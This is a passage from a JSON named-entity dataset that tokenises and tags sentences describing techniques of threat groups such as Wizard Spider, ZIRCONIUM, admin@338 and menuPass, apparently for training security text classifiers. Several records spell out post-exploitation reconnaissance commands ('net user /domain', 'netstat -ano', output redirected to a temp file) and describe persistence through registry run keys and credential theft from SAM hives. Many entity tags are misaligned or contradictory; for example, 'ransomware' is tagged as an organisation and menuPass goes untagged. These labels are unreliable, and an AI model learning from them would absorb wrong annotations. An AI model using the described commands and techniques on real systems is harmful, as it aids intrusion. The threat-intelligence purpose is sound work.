"scripts", - "to", - "download", - "malware", - "on", - "victim's", - "machines.", - "It", - "has", - "also", - "used", - "PowerShell", - "to", - "execute", - "commands", - "and", - "move", - "laterally", - "through", - "a", - "victim", - "network." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "used", - "process", - "injection", - "to", - "execute", - "payloads", - "to", - "escalate", - "privileges." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "established", - "persistence", - "via", - "the", - "Registry", - "key", - "<code>HKCU\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run</code>", - "and", - "a", - "shortcut", - "within", - "the", - "startup", - "folder." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "used", - "RDP", - "for", - "lateral", - "movement", - "and", - "to", - "deploy", - "ransomware", - "interactively." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "O" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "used", - "the", - "WebDAV", - "protocol", - "to", - "execute", - "Ryuk", - "payloads", - "hosted", - "on", - "network", - "file", - "shares." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "used", - "networkdll", - "for", - "network", - "discovery", - "and", - "psfin", - "specifically", - "for", - "financial", - "and", - "point", - "of", - "sale", - "indicators.", - "Wizard", - "Spider", - "has", - "also", - "used", - "AdFind,", - "<code>nltest/dclist</code>,", - "and", - "PowerShell", - "script", - "Get-DataInfo.ps1", - "to", - "enumerate", - "domain", - "computers,", - "including", - "the", - "domain", - "controller." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "B-Way", - "B-SamFile", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "utilized", - "`rundll32.exe`", - "to", - "deploy", - "ransomware", - "commands", - "with", - "the", - "use", - "of", - "WebDAV." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-SamFile", - "O", - "I-Purp", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "used", - "SMB", - "to", - "drop", - "Cobalt", - "Strike", - "Beacon", - "on", - "a", - "domain", - "controller", - "for", - "lateral", - "movement." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "used", - "scheduled", - "tasks", - "to", - "establish", - "persistence", - "for", - "TrickBot", - "and", - "other", - "malware." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "acquired", - "credentials", - "from", - "the", - "SAM/SECURITY", - "registry", - "hives." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "used", - "WMI", - "to", - "identify", - "anti-virus", - "products", - "installed", - "on", - "a", - "victim's", - "machine." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "used", - "`services.exe`", - "to", - "execute", - "scripts", - "and", - "executables", - "during", - "lateral", - "movement", - "within", - "a", - "victim's", - "network.", - "Wizard", - "Spider", - "has", - "also", - "used", - "batch", - "scripts", - "that", - "leverage", - "PsExec", - "to", - "execute", - "a", - "previously", - "transferred", - "ransomware", - "payload", - "on", - "a", - "victim's", - "network." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "used", - "taskkill.exe", - "and", - "net.exe", - "to", - "stop", - "backup,", - "catalog,", - "cloud,", - "and", - "other", - "services", - "prior", - "to", - "network", - "encryption." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "utilized", - "the", - "PowerShell", - "script", - "`Get-DataInfo.ps1`", - "to", - "collect", - "installed", - "backup", - "software", - "information", - "from", - "a", - "compromised", - "machine." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "B-Way", - "O", - "B-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "used", - "spearphishing", - "attachments", - "to", - "deliver", - "Microsoft", - "documents", - "containing", - "macros", - "or", - "PDFs", - "containing", - "malicious", - "links", - "to", - "download", - "either", - "Emotet,", - "Bokbot,", - "TrickBot,", - "or", - "Bazar." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "sent", - "phishing", - "emails", - "containing", - "a", - "link", - "to", - "an", - "actor-controlled", - "Google", - "Drive", - "document", - "or", - "other", - "free", - "online", - "file", - "hosting", - "services." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "I-Way", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "used", - "Systeminfo", - "and", - "similar", - "commands", - "to", - "acquire", - "detailed", - "configuration", - "information", - "of", - "a", - "victim's", - "machine.", - "Wizard", - "Spider", - "has", - "also", - "utilized", - "the", - "PowerShell", - "cmdlet", - "`Get-ADComputer`", - "to", - "collect", - "DNS", - "hostnames,", - "last", - "logon", - "dates,", - "and", - "operating", - "system", - "information", - "from", - "Active", - "Directory." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "used", - "ipconfig", - "to", - "identify", - "the", - "network", - "configuration", - "of", - "a", - "victim", - "machine.", - "Wizard", - "Spider", - "has", - "also", - "used", - "the", - "PowerShell", - "cmdlet", - "`Get-ADComputer`", - "to", - "collect", - "IP", - "address", - "data", - "from", - "Active", - "Directory." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "used", - "\"whoami\"", - "to", - "identify", - "the", - "local", - "user", - "and", - "their", - "privileges." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "utilized", - "tools", - "such", - "as", - "Empire,", - "Cobalt", - "Strike,", - "Cobalt", - "Strike,", - "Rubeus,", - "AdFind,", - "BloodHound,", - "Metasploit,", - "Advanced", - "IP", - "Scanner,", - "Nirsoft", - "PingInfoView,", - "and", - "SoftPerfect", - "Network", - "Scanner", - "for", - "targeting", - "efforts." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "B-Way", - "B-Tool", - "B-Way", - "B-Tool", - "B-Way", - "B-Way", - "B-Way", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "B-Way", - "B-Tool", - "O", - "B-Way", - "I-Tool", - "I-Tool", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "used", - "valid", - "credentials", - "for", - "privileged", - "accounts", - "with", - "the", - "goal", - "of", - "accessing", - "domain", - "controllers." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "I-Way", - "I-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "O", - "B-Purp" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "used", - "HTTP", - "for", - "network", - "communications." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "I-Idus", - "O" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "used", - "`cmd.exe`", - "to", - "execute", - "commands", - "on", - "a", - "victim's", - "machine." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "used", - "PowerShell", - "cmdlet", - "`Invoke-WCMDump`", - "to", - "enumerate", - "Windows", - "credentials", - "in", - "the", - "Credential", - "Manager", - "in", - "a", - "compromised", - "network." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "used", - "the", - "icacls", - "command", - "to", - "modify", - "access", - "control", - "to", - "backup", - "servers,", - "providing", - "them", - "with", - "full", - "control", - "of", - "all", - "the", - "system", - "folders." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "used", - "WMI", - "and", - "LDAP", - "queries", - "for", - "network", - "discovery", - "and", - "to", - "move", - "laterally.", - "Wizard", - "Spider", - "has", - "also", - "used", - "batch", - "scripts", - "to", - "leverage", - "WMIC", - "to", - "deploy", - "ransomware." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "B-Tool", - "B-Way", - "O", - "O", - "B-Way", - "O", - "B-OffAct", - "B-Org" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "used", - "Window", - "Remote", - "Management", - "to", - "move", - "laterally", - "through", - "a", - "victim", - "network." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "installed", - "TrickBot", - "as", - "a", - "service", - "named", - "ControlServiceA", - "in", - "order", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Wizard", - "Spider", - "has", - "established", - "persistence", - "using", - "Userinit", - "by", - "adding", - "the", - "Registry", - "key", - "HKLM\\SOFTWARE\\Microsoft\\Windows", - "NT\\CurrentVersion\\Winlogon." - ], - "ner_tags": [ - "I-HackOrg", - "I-HackOrg", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "ZIRCONIUM", - "has", - "used", - "Dropbox", - "for", - "C2", - "allowing", - "upload", - "and", - "download", - "of", - "files", - "as", - "well", - "as", - "execution", - "of", - "arbitrary", - "commands." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "B-Features", - "O", - "I-Features", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZIRCONIUM", - "has", - "used", - "a", - "tool", - "to", - "steal", - "credentials", - "from", - "installed", - "web", - "browsers", - "including", - "Microsoft", - "Internet", - "Explorer", - "and", - "Google", - "Chrome." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "I-Tool", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "ZIRCONIUM", - "has", - "used", - "the", - "AES256", - "algorithm", - "with", - "a", - "SHA1", - "derived", - "key", - "to", - "decrypt", - "exploit", - "code." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZIRCONIUM", - "has", - "purchased", - "domains", - "for", - "use", - "in", - "targeted", - "campaigns." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-OffAct" - ] - }, - { - "tokens": [ - "ZIRCONIUM", - "has", - "exfiltrated", - "files", - "via", - "the", - "Dropbox", - "API", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "ZIRCONIUM", - "has", - "exfiltrated", - "stolen", - "data", - "to", - "Dropbox." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "ZIRCONIUM", - "has", - "exploited", - "CVE-2017-0005", - "for", - "local", - "privilege", - "escalation." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZIRCONIUM", - "has", - "used", - "tools", - "to", - "download", - "malicious", - "files", - "to", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZIRCONIUM", - "has", - "used", - "malicious", - "links", - "in", - "e-mails", - "to", - "lure", - "victims", - "into", - "downloading", - "malware." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "ZIRCONIUM", - "has", - "created", - "a", - "run", - "key", - "named", - "<code>Dropbox", - "Update", - "Setup</code>", - "to", - "mask", - "a", - "persistence", - "mechanism", - "for", - "a", - "malicious", - "binary." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZIRCONIUM", - "has", - "spoofed", - "legitimate", - "applications", - "in", - "phishing", - "lures", - "and", - "changed", - "file", - "extensions", - "to", - "conceal", - "installation", - "of", - "malware." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZIRCONIUM", - "has", - "used", - "the", - "msiexec.exe", - "command-line", - "utility", - "to", - "download", - "and", - "execute", - "malicious", - "MSI", - "files." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZIRCONIUM", - "targeted", - "presidential", - "campaign", - "staffers", - "with", - "credential", - "phishing", - "e-mails." - ], - "ner_tags": [ - "B-Idus", - "O", - "I-Org", - "I-Org", - "B-Purp", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "ZIRCONIUM", - "has", - "used", - "Python-based", - "implants", - "to", - "interact", - "with", - "compromised", - "hosts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZIRCONIUM", - "has", - "used", - "a", - "tool", - "to", - "query", - "the", - "Registry", - "for", - "proxy", - "settings." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZIRCONIUM", - "has", - "created", - "a", - "Registry", - "Run", - "key", - "named", - "<code>Dropbox", - "Update", - "Setup</code>", - "to", - "establish", - "persistence", - "for", - "a", - "malicious", - "Python", - "binary." - ], - "ner_tags": [ - "B-Org", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZIRCONIUM", - "has", - "used", - "multi-stage", - "packers", - "for", - "exploit", - "code." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZIRCONIUM", - "has", - "used", - "malicious", - "links", - "in", - "e-mails", - "to", - "deliver", - "malware." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZIRCONIUM", - "has", - "used", - "web", - "beacons", - "in", - "e-mails", - "to", - "track", - "hits", - "to", - "attacker-controlled", - "URL's." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "I-Way", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZIRCONIUM", - "has", - "used", - "AES", - "encrypted", - "communications", - "in", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "ZIRCONIUM", - "has", - "used", - "a", - "tool", - "to", - "capture", - "the", - "processor", - "architecture", - "of", - "a", - "compromised", - "host", - "in", - "order", - "to", - "register", - "it", - "with", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZIRCONIUM", - "has", - "used", - "a", - "tool", - "to", - "enumerate", - "proxy", - "settings", - "in", - "the", - "target", - "environment." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZIRCONIUM", - "has", - "used", - "a", - "tool", - "to", - "capture", - "the", - "username", - "on", - "a", - "compromised", - "host", - "in", - "order", - "to", - "register", - "it", - "with", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZIRCONIUM", - "has", - "used", - "a", - "tool", - "to", - "capture", - "the", - "time", - "on", - "a", - "compromised", - "host", - "in", - "order", - "to", - "register", - "it", - "with", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "ZIRCONIUM", - "has", - "used", - "GitHub", - "to", - "host", - "malware", - "linked", - "in", - "spearphishing", - "e-mails." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "ZIRCONIUM", - "has", - "used", - "a", - "tool", - "to", - "open", - "a", - "Windows", - "Command", - "Shell", - "on", - "a", - "remote", - "host." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "admin@338", - "has", - "exploited", - "client", - "software", - "vulnerabilities", - "for", - "execution,", - "such", - "as", - "Microsoft", - "Word", - "CVE-2012-0158." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Exp", - "O", - "O", - "O", - "O", - "I-SamFile", - "I-SamFile", - "B-Features" - ] - }, - { - "tokens": [ - "admin@338", - "actors", - "used", - "the", - "following", - "commands", - "after", - "exploiting", - "a", - "machine", - "with", - "LOWBALL", - "malware", - "to", - "obtain", - "information", - "about", - "files", - "and", - "directories:", - "<code>dir", - "c:\\", - ">>", - "%temp%\\download</code>", - "<code>dir", - "\"c:\\Documents", - "and", - "Settings\"", - ">>", - "%temp%\\download</code>", - "<code>dir", - "\"c:\\Program", - "Files\\\"", - ">>", - "%temp%\\download</code>", - "<code>dir", - "d:\\", - ">>", - "%temp%\\download</code>" - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "admin@338", - "actors", - "used", - "the", - "following", - "commands", - "following", - "exploitation", - "of", - "a", - "machine", - "with", - "LOWBALL", - "malware", - "to", - "enumerate", - "user", - "accounts:", - "<code>net", - "user", - ">>", - "%temp%\\download</code>", - "<code>net", - "user", - "/domain", - ">>", - "%temp%\\download</code>" - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "admin@338", - "actors", - "used", - "the", - "following", - "command", - "following", - "exploitation", - "of", - "a", - "machine", - "with", - "LOWBALL", - "malware", - "to", - "list", - "local", - "groups:", - "<code>net", - "localgroup", - "administrator", - ">>", - "%temp%\\download</code>" - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "admin@338", - "has", - "attempted", - "to", - "get", - "victims", - "to", - "launch", - "malicious", - "Microsoft", - "Word", - "attachments", - "delivered", - "via", - "spearphishing", - "emails." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-SamFile", - "I-SamFile", - "B-SecTeam", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "admin@338", - "actors", - "used", - "the", - "following", - "command", - "to", - "rename", - "one", - "of", - "their", - "tools", - "to", - "a", - "benign", - "file", - "name:", - "<code>ren", - "\"%temp%\\upload\"", - "audiodg.exe</code>" - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "B-SamFile" - ] - }, - { - "tokens": [ - "admin@338", - "has", - "sent", - "emails", - "with", - "malicious", - "Microsoft", - "Office", - "documents", - "attached." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "admin@338", - "actors", - "used", - "the", - "following", - "commands", - "after", - "exploiting", - "a", - "machine", - "with", - "LOWBALL", - "malware", - "to", - "obtain", - "information", - "about", - "the", - "OS:", - "<code>ver", - ">>", - "%temp%\\download</code>", - "<code>systeminfo", - ">>", - "%temp%\\download</code>" - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "admin@338", - "actors", - "used", - "the", - "following", - "command", - "after", - "exploiting", - "a", - "machine", - "with", - "LOWBALL", - "malware", - "to", - "acquire", - "information", - "about", - "local", - "networks:", - "<code>ipconfig", - "/all", - ">>", - "%temp%\\download</code>" - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "admin@338", - "actors", - "used", - "the", - "following", - "command", - "following", - "exploitation", - "of", - "a", - "machine", - "with", - "LOWBALL", - "malware", - "to", - "display", - "network", - "connections:", - "<code>netstat", - "-ano", - ">>", - "%temp%\\download</code>" - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "admin@338", - "actors", - "used", - "the", - "following", - "command", - "following", - "exploitation", - "of", - "a", - "machine", - "with", - "LOWBALL", - "malware", - "to", - "obtain", - "information", - "about", - "services:", - "<code>net", - "start", - ">>", - "%temp%\\download</code>" - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Following", - "exploitation", - "with", - "LOWBALL", - "malware,", - "admin@338", - "actors", - "created", - "a", - "file", - "containing", - "a", - "list", - "of", - "commands", - "to", - "be", - "executed", - "on", - "the", - "compromised", - "computer." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "B-Tool", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "menuPass", - "has", - "encrypted", - "files", - "and", - "information", - "before", - "exfiltration." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "menuPass", - "has", - "compressed", - "files", - "before", - "exfiltration", - "using", - "TAR", - "and", - "RAR." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "menuPass", - "has", - "used", - "the", - "Csvde", - "tool", - "to", - "collect", - "Active", - "Directory", - "files", - "and", - "data." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "menuPass", - "has", - "used", - "Wevtutil", - "to", - "remove", - "PowerShell", - "execution", - "logs." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "menuPass", - "has", - "resized", - "and", - "added", - "data", - "to", - "the", - "certificate", - "table", - "to", - "enable", - "the", - "signing", - "of", - "modified", - "files", - "with", - "legitimate", - "signatures." - ], - 